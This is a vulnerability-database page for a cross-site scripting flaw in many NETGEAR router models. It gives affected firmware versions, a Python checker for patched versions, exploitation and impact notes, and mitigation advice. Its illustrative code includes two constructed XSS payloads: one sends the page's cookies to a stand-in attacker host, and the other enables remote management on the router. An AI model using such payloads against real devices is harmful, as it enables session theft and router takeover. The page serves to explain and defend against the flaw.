CVE-2017-18783
Description
Certain NETGEAR devices are affected by XSS. This affects D6200 before 1.1.00.24, D7000 before 1.0.1.52, JNR1010v2 before 1.1.0.44, JR6150 before 1.0.1.12, JWNR2010v5 before 1.1.0.44, PR2000 before 1.0.0.20, R6020 before 1.0.0.26, R6050 before 1.0.1.12, R6080 before 1.0.0.26, R6120 before 1.0.0.36, R6220 before 1.1.0.60, R6700v2 before 1.2.0.12, R6800 before 1.2.0.12, R6900v2 before 1.2.0.12, WNDR3700v5 before 1.1.0.50, WNR1000v4 before 1.1.0.44, WNR2020 before 1.1.0.44, and WNR2050 before 1.1.0.44.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Multiple NETGEAR routers are vulnerable to cross-site scripting (XSS) before specific firmware versions, potentially allowing information disclosure or session hijacking.
Vulnerability
A cross-site scripting (XSS) vulnerability exists in the web-based management interface of multiple NETGEAR router models. The flaw is present in firmware versions prior to the fixed releases listed in the advisory [1]. Affected devices include D6200 (before 1.1.00.24), D7000 (before 1.0.1.52), JNR1010v2 (before 1.1.0.44), JR6150 (before 1.0.1.12), JWNR2010v5 (before 1.1.0.44), PR2000 (before 1.0.0.20), R6020 (before 1.0.0.26), R6050 (before 1.0.1.12), R6080 (before 1.0.0.26), R6120 (before 1.0.0.36), R6220 (before 1.1.0.60), R6700v2 (before 1.2.0.12), R6800 (before 1.2.0.12), R6900v2 (before 1.2.0.12), WNDR3700v5 (before 1.1.0.50), WNR1000v4 (before 1.1.0.44), WNR2020 (before 1.1.0.44), and WNR2050 (before 1.1.0.44). Note that the hardware revision is part of the product name: R6700v2 is listed, the original R6700 is not. The CVE description does not name the affected page or parameter; as with any XSS, the root cause is user-controlled input that the interface writes into an HTML page without adequate output encoding, so the administrator's browser parses it as markup or script rather than as data.
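The per-model cutoffs above are easy to get wrong by hand: the version strings have uneven component widths ("1.1.00.24"), devices report a build suffix, and a plain string comparison mis-orders "1.1.0.100" against "1.1.0.50". The following check, written for this page as an added example and not NETGEAR's or the advisory's own tooling, compares a running firmware string against the fixed release for its model. It assumes the "V1.1.0.60_1.0.1" reporting format seen on NETGEAR devices (the part after "_" is treated as a build suffix and ignored), and the sample inventory at the bottom is constructed.

```python
import re

# First fixed firmware per model, taken from the CVE-2017-18783 description.
# Exact model strings matter: the advisory lists R6700v2 (not R6700) and
# WNR1000v4 (not WNR1000); other hardware revisions are separate products.
FIXED_VERSIONS = {
    "D6200": "1.1.00.24",
    "D7000": "1.0.1.52",
    "JNR1010v2": "1.1.0.44",
    "JR6150": "1.0.1.12",
    "JWNR2010v5": "1.1.0.44",
    "PR2000": "1.0.0.20",
    "R6020": "1.0.0.26",
    "R6050": "1.0.1.12",
    "R6080": "1.0.0.26",
    "R6120": "1.0.0.36",
    "R6220": "1.1.0.60",
    "R6700v2": "1.2.0.12",
    "R6800": "1.2.0.12",
    "R6900v2": "1.2.0.12",
    "WNDR3700v5": "1.1.0.50",
    "WNR1000v4": "1.1.0.44",
    "WNR2020": "1.1.0.44",
    "WNR2050": "1.1.0.44",
}


def parse_version(version: str) -> tuple:
    """Turn a NETGEAR firmware string into a tuple of integers for comparison.

    Accepts the bare form "1.1.0.60" and the "V1.1.0.60_1.0.1" form that
    devices report (assumed here from NETGEAR's usual naming); anything after
    "_" is a build suffix and is dropped. Numeric comparison is required:
    "1.1.00.24" in the advisory is 1.1.0.24, and "1.1.0.100" is newer than
    "1.1.0.50" even though it sorts earlier as a string.
    """
    core = version.strip().lstrip("Vv").split("_", 1)[0]
    if not re.fullmatch(r"\d+(\.\d+)*", core):
        raise ValueError(f"unrecognised firmware version: {version!r}")
    return tuple(int(part) for part in core.split("."))


def _padded(a: tuple, b: tuple) -> tuple:
    """Right-pad the shorter tuple with zeros so 1.1.0 == 1.1.0.0."""
    n = max(len(a), len(b))
    return a + (0,) * (n - len(a)), b + (0,) * (n - len(b))


def is_affected(model: str, running_version: str):
    """True if the running firmware is older than the first fixed release,
    False if it is at or above it, None if the model is not in the advisory.

    Matching is case-insensitive but otherwise exact, so "R6700" does not
    silently match "R6700v2".
    """
    wanted = model.strip().lower()
    key = next((m for m in FIXED_VERSIONS if m.lower() == wanted), None)
    if key is None:
        return None
    running, fixed = _padded(parse_version(running_version),
                             parse_version(FIXED_VERSIONS[key]))
    return running < fixed


if __name__ == "__main__":
    # Constructed sample inventory (model, firmware as reported by the device).
    inventory = [
        ("R6220", "V1.1.0.50_1.0.1"),   # below 1.1.0.60: affected
        ("D6200", "1.1.00.24"),         # exactly the fixed release: not affected
        ("WNR2050", "V1.1.0.100_1.0.2"),  # above 1.1.0.44 numerically: not affected
        ("R6700", "1.0.0.1"),           # not in the advisory: unknown
    ]
    for model, ver in inventory:
        print(f"{model:10} {ver:18} affected={is_affected(model, ver)}")
```

A device that is not in the table returns None rather than False; treat that as "not covered by this advisory", not as "safe", and check the vendor's own advisory for that hardware revision.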
Exploitation
An attacker must get an administrator who is logged in to the router's web interface to load a crafted URL or submit crafted input. No special network position is required: the attacker does not need to reach the router's LAN address (for example 192.168.1.1) at all, because the request is issued by the victim's browser, which can. Luring the administrator to a malicious page, or sending the link by e-mail or chat, is enough. The injected script then runs in the origin of the router's web interface, so it can read what the page shows and issue the same requests the logged-in administrator could. The CVE description does not state whether the injection is reflected or stored, nor which page or parameter carries it.
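To make the mechanism concrete, here is the reflected pattern side by side with its hardened form, as an added example written for this page; it is not NETGEAR firmware code, and the status page, the "name" parameter, the LAN address and the apply.cgi endpoint in the second payload are all constructed for the illustration. The vulnerable renderer interpolates the parameter raw into a text node and into a double-quoted attribute; the hardened one applies HTML output encoding, which is the fix for the bug class.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed for this example: a hypothetical router status page that
# echoes a "name" query parameter into the HTML. Not from the advisory.
ROUTER_URL = "http://192.168.1.1/status.cgi"  # assumed LAN address of the device

# Two constructed payloads, one per HTML context the page writes into.
PAYLOAD_TEXT = ('<script>new Image().src="http://attacker.invalid/?c="'
                '+document.cookie</script>')
PAYLOAD_ATTR = '" autofocus onfocus="fetch(\'/apply.cgi?remote_mgmt=1\')'


def attacker_url(payload: str) -> str:
    """The link an attacker hands to a logged-in admin (reflected XSS).

    The victim's browser resolves the LAN address; the attacker never
    needs to reach it directly.
    """
    return f"{ROUTER_URL}?name={quote(payload, safe='')}"


def _name_param(url: str) -> str:
    return parse_qs(urlsplit(url).query).get("name", [""])[0]


def render_vulnerable(url: str) -> str:
    """Interpolates the parameter unencoded: the classic reflected-XSS bug."""
    name = _name_param(url)
    return (
        "<html><body>"
        f"<h1>Device: {name}</h1>"
        f'<input type="text" name="name" value="{name}">'
        "</body></html>"
    )


def render_hardened(url: str) -> str:
    """Same page with output encoding. html.escape(quote=True) covers both
    the text-node context (< > &) and the double-quoted attribute context
    (" and ') in one call, so both payloads end up as inert data."""
    name = html.escape(_name_param(url), quote=True)
    return (
        "<html><body>"
        f"<h1>Device: {name}</h1>"
        f'<input type="text" name="name" value="{name}">'
        "</body></html>"
    )


def reflects_raw(page: str, payload: str) -> bool:
    """True when the payload landed in the markup unchanged, i.e. the browser
    would parse it as markup or script rather than as text."""
    return payload in page


if __name__ == "__main__":
    for payload in (PAYLOAD_TEXT, PAYLOAD_ATTR):
        link = attacker_url(payload)
        print("vulnerable executes:", reflects_raw(render_vulnerable(link), payload))
        print("hardened executes:  ", reflects_raw(render_hardened(link), payload))
```

The second payload shows why "the impact is limited to the web interface" is not the same as "low impact": once script runs in the interface's origin, it can submit a configuration request with the administrator's session exactly as a form on the page would.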
Impact
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of an authenticated administrator, in the origin of the router's management interface. This can lead to disclosure of sensitive information (session tokens and the configuration data the interface displays) and to configuration changes made with the administrator's session, for instance altering DNS servers or enabling remote management, since the script can submit the same forms the administrator can. The impact is confined to what the web interface permits; the flaw does not by itself provide remote code execution on the device, although settings changed through the interface can be used to stage further attacks on the network behind it.
Mitigation
NETGEAR has released fixed firmware for all affected models. Update to the release listed for your model (or later) from the NETGEAR Support page [1], and compare the installed version against that per-model list rather than relying on a generic "latest" label, since each model has its own fixed release. No vendor workaround is published. Until the update is applied, ordinary admin-interface hygiene limits exposure: log out of the router's interface when finished rather than leaving a session open in a browser also used for general browsing, and keep remote management (WAN-side access to the interface) disabled so that an attack requires the victim's browser to be on the LAN.
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- NETGEAR/NETGEAR devices
- Range: <1.1.0.50 (a single range as indexed; the fixed version differs per model, see the description above)
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
News mentions
No linked articles in our index yet.